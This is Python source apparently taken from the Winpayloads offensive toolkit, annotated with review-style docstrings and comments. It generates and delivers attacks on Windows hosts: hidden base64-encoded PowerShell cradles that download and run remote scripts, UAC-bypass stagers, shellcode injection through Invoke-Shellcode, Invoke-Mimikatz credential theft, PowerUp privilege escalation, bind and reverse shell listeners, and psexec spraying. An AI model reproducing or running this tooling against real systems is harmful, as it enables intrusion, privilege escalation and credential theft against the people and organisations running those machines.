def reversePowerShellInvokeMimikatzGeneration(payloadchoice, payloadname):
    """Format ``payloadchoice`` with the local IP/port, push it to the selected client and print its first reply.

    A throw-away file server rooted at ``./externalmodules`` is started on an
    ephemeral port first, so the formatted script can fetch modules from it.
    After ``clientUpload`` queues the script, this function blocks (polling
    every 0.1 s) until the targeted handler's ``in_buffer`` holds a response,
    prints that response and returns.

    Args:
        payloadchoice: ``%``-format template expecting ``(ip, port)``.
        payloadname: forwarded as the first argument of ``clientUpload``.

    Returns:
        The literal string ``"pass"`` in every case, including after Ctrl-C.
    """
    from menu import returnIP
    # Ephemeral port for the module server; DoServe is assumed to return
    # promptly (it is not joined or checked here).
    moduleport = FUNCTIONS().randomUnusedPort()
    FUNCTIONS().DoServe(returnIP(),
                        "",
                        "./externalmodules",
                        port=moduleport,
                        printIt=False)
    powershellScript = payloadchoice % (returnIP(), moduleport)
    # NOTE(review): clientUpload as defined in this listing takes
    # (powershellExec, isExe, json); this call passes an extra leading
    # positional argument -- confirm which signature is actually in scope.
    # Also, clientUpload returns False when no client is selected and
    # int(False) == 0, so the handler lookup below would then target key 0
    # instead of bailing out.
    clientnumber = int(
        clientUpload(
            payloadname,
            powershellScript,
            isExe=False,
            json=
            '{"type":"script", "data":"%s", "sendoutput":"true", "multiple":"false"}'
        ))
    from stager import returnServerList
    # Busy-wait (0.1 s steps) on each server until the client's handler has
    # something in in_buffer; pop() takes the most recent entry.  `time` is a
    # module-level name, not imported in this function.  Ctrl-C abandons the
    # wait silently.
    try:
        for server in returnServerList():
            while True:
                if server.handlers[clientnumber].in_buffer:
                    print server.handlers[clientnumber].in_buffer.pop()
                    break
                else:
                    time.sleep(0.1)
    except KeyboardInterrupt:
        pass
    return "pass"
 def UACBYPASS(self, version):
     """Write ``uacbypass.rc`` and stage the version-specific PowerShell script for it.

     Two ports are allocated: ``randomPort`` is where a one-shot
     ``stagePowershellCode`` server (spawned as a daemon ``Process``) serves
     ``stage.ps1``, and ``moduleport`` is a ``DoServe`` instance exposing
     ``./externalmodules``.  Only ``version`` ``"7"`` and ``"10"`` produce a
     script; the rc file is written regardless.

     Args:
         version: Windows major version as a string (``"7"`` or ``"10"``).

     Returns:
         ``self.shellcode``, unchanged.
     """
     from menu import returnIP
     # Port the one-shot stager will listen on; it is baked into the rc file.
     randomPort = FUNCTIONS().randomUnusedPort()
     uacbypassrcfilecontents = """run post/windows/manage/exec_powershell SCRIPT="IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/stage.ps1')" SESSION=1""" % (
         returnIP(), randomPort)
     # Separate server for ./externalmodules, referenced by the staged script.
     moduleport = FUNCTIONS().randomUnusedPort()
     FUNCTIONS().DoServe(returnIP(),
                         "",
                         "./externalmodules",
                         port=moduleport,
                         printIt=False)
     if version == "7":
         # self.injectshellcode_nosleep is UTF-16LE encoded then base64'd, the
         # form PowerShell's -enc switch expects.
         uacbypassfilecontent = """IEX (New-Object Net.WebClient).DownloadString("http://%s:%s/Invoke-BypassUAC.ps1");\nInvoke-BypassUAC -Command \"powershell -enc %s\" """ % (
             returnIP(), moduleport,
             base64.b64encode(
                 self.injectshellcode_nosleep.encode('utf_16_le')))
         # Daemon process: dies with the parent; it is never joined and its
         # failures are not reported.
         a = multiprocessing.Process(target=FUNCTIONS().stagePowershellCode,
                                     args=(uacbypassfilecontent,
                                           randomPort))
         a.daemon = True
         a.start()
     elif version == "10":
         uacbypassfilecontent = """IEX (New-Object Net.WebClient).DownloadString("http://%s:%s/Invoke-SilentCleanUpBypass.ps1");\nInvoke-SilentCleanUpBypass -Command \"cmd /c powershell -WindowStyle Hidden -enc %s && REM\" """ % (
             returnIP(), moduleport,
             base64.b64encode(
                 self.injectshellcode_nosleep.encode('utf_16_le')))
         a = multiprocessing.Process(target=FUNCTIONS().stagePowershellCode,
                                     args=(uacbypassfilecontent,
                                           randomPort))
         a.daemon = True
         a.start()
     # NOTE(review): any other `version` reaches this point with no script
     # defined and no stager started, yet the rc file is still written -- an
     # explicit warning or ValueError would make the mismatch visible.
     with open('uacbypass.rc', 'w') as uacbypassfilerc:
         uacbypassfilerc.write(uacbypassrcfilecontents)
         uacbypassfilerc.close()  # redundant: the with-block closes the file
         return self.shellcode
def printListener(printit=True, returnit=False):
    """Render the PowerShell stager, serve it, and register the matching ``Server``.

    Prompts for (b)ind or (r)everse, fills ``lib/powershell/stager.ps1`` with
    that choice (reverse: local IP and port 5555; bind: port 5556), writes the
    result to ``payloaddir()/p.ps1`` and serves it from an ephemeral port.  A
    ``Server`` object is appended to the module-level ``serverlist`` unless one
    for that port already appears to be present.

    Args:
        printit: print the encoded one-liner that downloads the stager.
        returnit: return that one-liner instead of ``"pass"``.

    Returns:
        The encoded stager command when ``returnit`` is true, else ``"pass"``.
    """
    from listener import Server
    from menu import returnIP
    powershellFileName = 'p.ps1'

    # Re-prompt until the (case-folded) answer is exactly 'b' or 'r'.
    while True:
        bindOrReverse = prompt_toolkit.prompt('[?] (b)ind/(r)everse: ',
                                              patch_stdout=True,
                                              completer=WordCompleter(
                                                  ['b', 'r'])).lower()
        if bindOrReverse == 'b' or bindOrReverse == 'r':
            break
    # NOTE(review): open(...).read() in both branches never closes the
    # handle; a with-block would release it deterministically.
    if bindOrReverse == 'r':
        powershellContent = open('lib/powershell/stager.ps1', 'r').read()
        windows_powershell_stager = powershellContent % ('False', returnIP(),
                                                         '5555')
    if bindOrReverse == 'b':
        powershellContent = open('lib/powershell/stager.ps1', 'r').read()
        windows_powershell_stager = powershellContent % ('True', '', '5556')

    with open((payloaddir() + '/' + powershellFileName),
              'w') as powershellStagerFile:
        powershellStagerFile.write(windows_powershell_stager)
        powershellStagerFile.close()  # redundant: the with-block closes the file

    randoStagerDLPort = FUNCTIONS().randomUnusedPort()

    FUNCTIONS().DoServe(returnIP(),
                        powershellFileName,
                        payloaddir(),
                        port=randoStagerDLPort,
                        printIt=False)
    # UTF-16LE + base64 is the encoding PowerShell -enc expects.  The
    # 'base64' codec is Python 2 only and inserts newlines, hence the
    # replace(); base64.b64encode would be the portable equivalent.
    stagerexec = 'powershell -w hidden -noni -enc ' + (
        "IEX (New-Object Net.Webclient).DownloadString('http://" + returnIP() +
        ":" + str(randoStagerDLPort) + "/" + powershellFileName +
        "')").encode('utf_16_le').encode('base64').replace('\n', '')

    if printit:
        print t.bold_green + '[!] Run this on target machine...' + t.normal + '\n\n' + stagerexec + '\n'

    # NOTE(review): the substring test on str(serverlist) matches any server
    # whose repr happens to contain '5556' / '5555' (an IP octet, another
    # port); comparing the servers' port attribute would be more reliable.
    if bindOrReverse == 'b':
        if not '5556' in str(serverlist):
            ipADDR = raw_input(
                '[?] IP Address of target (after executing stager): ')
            connectserver = Server(ipADDR, 5556, bindsocket=False)
            serverlist.append(connectserver)

    if bindOrReverse == 'r':
        if not '5555' in str(serverlist):
            listenerserver = Server('0.0.0.0', 5555, bindsocket=True)
            serverlist.append(listenerserver)
    if returnit:
        return stagerexec
    else:
        return "pass"
def clientUpload(powershellExec, isExe, json):
    """Queue a base64 (UTF-16LE) PowerShell payload on the selected client's ``out_buffer``.

    ``checkUpload()`` selects the client; with no selection ``False`` is
    returned and nothing is sent.  When ``isExe`` is true the shellcode text is
    wrapped in an architecture-selecting launcher that pulls
    ``Invoke-Shellcode.ps1`` from a fresh ``./externalmodules`` server;
    otherwise ``powershellExec`` is encoded as-is.  Payloads that
    ``checkPayloadLength`` splits are sent chunk by chunk through the ``json``
    template and terminated with a ``"multiple":"exec"`` message.

    Args:
        powershellExec: PowerShell source, or shellcode text when ``isExe``.
        isExe: wrap as a shellcode launcher instead of a plain script.
        json: ``%``-format template with one ``%s`` slot for the base64 data.
            (Shadows the stdlib module name inside this function.)

    Returns:
        The client number, or ``False`` when no client is selected.  Callers
        that wrap the result in ``int()`` turn ``False`` into ``0``.
    """
    from menu import returnIP
    from encrypt import getSandboxScripts
    clientnumber = checkUpload()
    if clientnumber:
        if isExe:
            newpayloadlayout = FUNCTIONS().powershellShellcodeLayout(
                powershellExec)
            moduleport = FUNCTIONS().randomUnusedPort()
            FUNCTIONS().DoServe(returnIP(),
                                "",
                                "./externalmodules",
                                port=moduleport,
                                printIt=False)
            encPowershell = getSandboxScripts('powershell')
            # rstrip(',') drops the trailing comma so the text forms a valid
            # PowerShell @() array literal.
            encPowershell += "IEX(New-Object Net.WebClient).DownloadString('http://%s:%s/Invoke-Shellcode.ps1');Start-Sleep 30;Invoke-Code -Force -Shellcode @(%s)" % (
                returnIP(), moduleport, newpayloadlayout.rstrip(','))
            # PowerShell -enc expects UTF-16LE then base64.
            encPowershell = base64.b64encode(encPowershell.encode('UTF-16LE'))
            # In the path literal below, '\\v' is escaped because '\v' alone
            # is a vertical tab; '\S' and '\W' are not escape sequences in a
            # str literal and survive as written.
            fullExec = "$Arch = (Get-Process -Id $PID).StartInfo.EnvironmentVariables['PROCESSOR_ARCHITECTURE'];if($Arch -eq 'x86'){powershell -exec bypass -enc \"%s\"}elseif($Arch -eq 'amd64'){$powershell86 = $env:windir + '\SysWOW64\WindowsPowerShell\\v1.0\powershell.exe';& $powershell86 -exec bypass -enc \"%s\"}" % (
                encPowershell, encPowershell)
            b64Exec = base64.b64encode(fullExec.encode('UTF-16LE'))
            lenb64 = len(b64Exec)
        else:
            b64Exec = base64.b64encode(powershellExec.encode('UTF-16LE'))
            lenb64 = len(b64Exec)

        # NOTE(review): 'splitPayoad' is a typo for splitPayload (kept here to
        # leave the code untouched).  lenb64 above is computed but never used.
        splitPayoad = checkPayloadLength(b64Exec)

        # Base64 text is limited to [A-Za-z0-9+/=], so splicing it into the
        # JSON template with % needs no escaping.  Chunks are paced with fixed
        # sleeps; there is no acknowledgement from the client.
        if splitPayoad:
            for p in splitPayoad:
                for server in serverlist:
                    if clientnumber in server.handlers.keys():
                        server.handlers[clientnumber].out_buffer.append(json %
                                                                        (p))
                        time.sleep(0.5)
            time.sleep(0.5)
            # Terminator telling the client to run the assembled chunks.
            for server in serverlist:
                if clientnumber in server.handlers.keys():
                    server.handlers[clientnumber].out_buffer.append(
                        '{"type":"", "data":"", "sendoutput":"false", "multiple":"exec"}'
                    )
        else:
            for server in serverlist:
                if clientnumber in server.handlers.keys():
                    server.handlers[clientnumber].out_buffer.append(json %
                                                                    (b64Exec))

        return clientnumber

    else:
        return False
 def ALLCHECKS(self):
     """Write ``allchecks.ps1`` (a one-line fetch-and-run of ``PowerUp.ps1``) to the current directory.

     ``./externalmodules`` is served on an ephemeral port first so the written
     script has somewhere to download ``PowerUp.ps1`` from; the server's
     lifetime is whatever ``DoServe`` provides (not managed here).

     Returns:
         ``self.shellcode``, unchanged.
     """
     from menu import returnIP
     moduleport = FUNCTIONS().randomUnusedPort()
     FUNCTIONS().DoServe(returnIP(),
                         "",
                         "./externalmodules",
                         port=moduleport,
                         printIt=False)
     with open('allchecks.ps1', 'w') as allchecksfile:
         allchecksfile.write(
             """IEX (New-Object Net.WebClient).DownloadString("http://%s:%s/PowerUp.ps1");invoke-allchecks"""
             % (returnIP(), moduleport))
         allchecksfile.close()  # redundant: the with-block closes the file
         return self.shellcode
파일: main.py 프로젝트: Brerras/Winpayloads
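 def randomUnusedPort(self):
     """Return a TCP port that was free on ``returnIP()`` at the moment of probing.

     Binds an ephemeral socket (port 0) so the kernel picks an unused port,
     reads the assigned number back and closes the socket.  The socket is
     closed in a ``finally`` so a failing ``bind`` does not leak a descriptor.

     Returns:
         int: the port number the kernel assigned.

     Raises:
         socket.error: if the address returned by ``returnIP()`` cannot be bound.

     Note:
         The port is only known to be free at probe time; another process may
         claim it before the caller binds it, so callers should tolerate a
         bind failure on the returned port rather than assume it is reserved.
     """
     from menu import returnIP
     probe = socket.socket()
     try:
         probe.bind((returnIP(), 0))
         port = probe.getsockname()[1]
     finally:
         probe.close()
     return port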
def UACBypassGeneration(payloadchoice, payloadname):
    """Format ``payloadchoice`` with the local IP, module port and encoded stager, then upload it.

    ``./externalmodules`` is served on an ephemeral port, ``printListener``
    is called in silent/return mode to obtain the encoded stager one-liner,
    and the result is passed to ``clientUpload``.

    Args:
        payloadchoice: ``%``-format template expecting ``(ip, port, encoded_stager)``.
        payloadname: not used by this function.

    Returns:
        The literal string ``"pass"``.
    """
    from menu import returnIP
    moduleport = FUNCTIONS().randomUnusedPort()
    FUNCTIONS().DoServe(returnIP(),
                        "",
                        "./externalmodules",
                        port=moduleport,
                        printIt=False)
    # printit=False, returnit=True: no console output, returns the command.
    encoded = printListener(False, True)
    powershellScript = payloadchoice % (returnIP(), moduleport, encoded)
    # NOTE(review): payloadchoice is used as a %-format string on the line
    # above, so calling it here raises TypeError when it is a str, and
    # powershellScript is built but never used -- confirm which value was
    # intended.  clientnumber is not read afterwards; int(False) would be 0
    # when no client is selected.
    clientnumber = int(
        clientUpload(
            payloadchoice(),
            isExe=False,
            json=
            '{"type":"script", "data":"%s", "sendoutput":"false", "multiple":"false"}'
        ))
    print t.bold_green + '\n[*] If UAC Bypass worked, expect a new admin session' + t.normal
    return "pass"
def DoPayloadUpload(payloadname):
    """Ask how the built payload should be delivered and dispatch on the answer.

    ``p`` / ``psexec`` hands ``<payloaddir>/<payloadname>.exe`` to
    ``DoPsexecSpray``; ``y`` or an empty answer serves ``payloadname`` from
    ``payloaddir()`` on port 8000 with the URL printed.  Any other answer is
    treated as "no" and nothing happens.

    Args:
        payloadname: base name of the payload inside ``payloaddir()``.

    Returns:
        ``None``.
    """
    from menu import returnIP
    choice = raw_input(
        '\n[*] Upload To Local Websever or (p)sexec? [y]/p/n: ').lower()
    if choice in ('p', 'psexec'):
        DoPsexecSpray(payloaddir() + '/' + payloadname + '.exe')
    elif choice in ('y', ''):
        # Fixed port 8000 here, unlike the ephemeral ports used elsewhere.
        FUNCTIONS().DoServe(
            returnIP(), payloadname, payloaddir(), port=8000, printIt=True)
파일: main.py 프로젝트: Brerras/Winpayloads
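 def stagePowershellCode(self, powershellFileContents, port):
     """Serve ``powershellFileContents`` as ``stage.ps1`` for exactly one HTTP request, then clean up.

     Creates (if needed) a ``stager`` directory, writes the script into it,
     binds ``SocketServer.TCPServer`` on ``(returnIP(), port)`` with the
     module-level ``HANDLER``, handles a single request and removes the
     directory.  The working-directory change and the on-disk script are
     undone in ``finally`` blocks, so a bind failure or an exception inside
     the handler no longer leaves the process in ``stager/`` with the script
     still on disk; the listening socket is closed explicitly as well.

     Args:
         powershellFileContents: text written verbatim to ``stage.ps1``.
         port: TCP port to listen on.

     Raises:
         socket.error: if the address/port cannot be bound.
     """
     from menu import returnIP
     import shutil
     DIR = 'stager'
     if not os.path.isdir(DIR):
         os.mkdir(DIR)
     origin = os.getcwd()
     # HANDLER presumably serves files relative to the cwd (hence the chdir)
     # -- confirm against its definition.
     os.chdir(DIR)
     try:
         with open('stage.ps1', 'w') as psFile:
             psFile.write(powershellFileContents)
         httpd = SocketServer.TCPServer((returnIP(), port), HANDLER)
         try:
             httpd.handle_request()  # one request only; no timeout is set
         finally:
             httpd.server_close()
     finally:
         os.chdir(origin)
         # Removes the whole directory, including one that pre-existed.
         shutil.rmtree(DIR)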
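def reverseIpAndPort(port):
    """Prompt for the callback port and IP, offering ``port`` and ``returnIP()`` as defaults.

    An empty answer keeps the default.  When ``returnIP()`` yields nothing
    usable, an error is printed and the IP is asked for once, without a
    default.

    Args:
        port: default port as a string (it is spliced into the prompt text).

    Returns:
        tuple: ``(portnum, ipaddr)`` as typed or defaulted; the port is not
        validated as numeric.
    """
    from menu import returnIP
    portnum = raw_input('\n[*] Press Enter For Default Port(%s)\n[*] Port> ' %
                        (t.bold_green + port + t.normal))
    # Was `len(portnum) is 0`: identity comparison of ints only works thanks
    # to CPython's small-int cache and is a SyntaxWarning on 3.8+.
    if not portnum:
        portnum = port
    IP = returnIP()
    if not IP:
        # Checked before prompting so a missing address is reported once and
        # the '%s' prompt never concatenates a None.
        print t.bold_red + 'Error Getting Ip Automatically' + t.normal
        ipaddr = raw_input(
            '\n[*] Please Enter Your IP Manually(Automatic Disabled)\n[*] IP> '
        )
    else:
        ipaddr = raw_input(
            '\n[*] Press Enter To Get Local Ip Automatically(%s)\n[*] IP> ' %
            (t.bold_green + IP + t.normal))
        if not ipaddr:
            ipaddr = IP
    return (portnum, ipaddr)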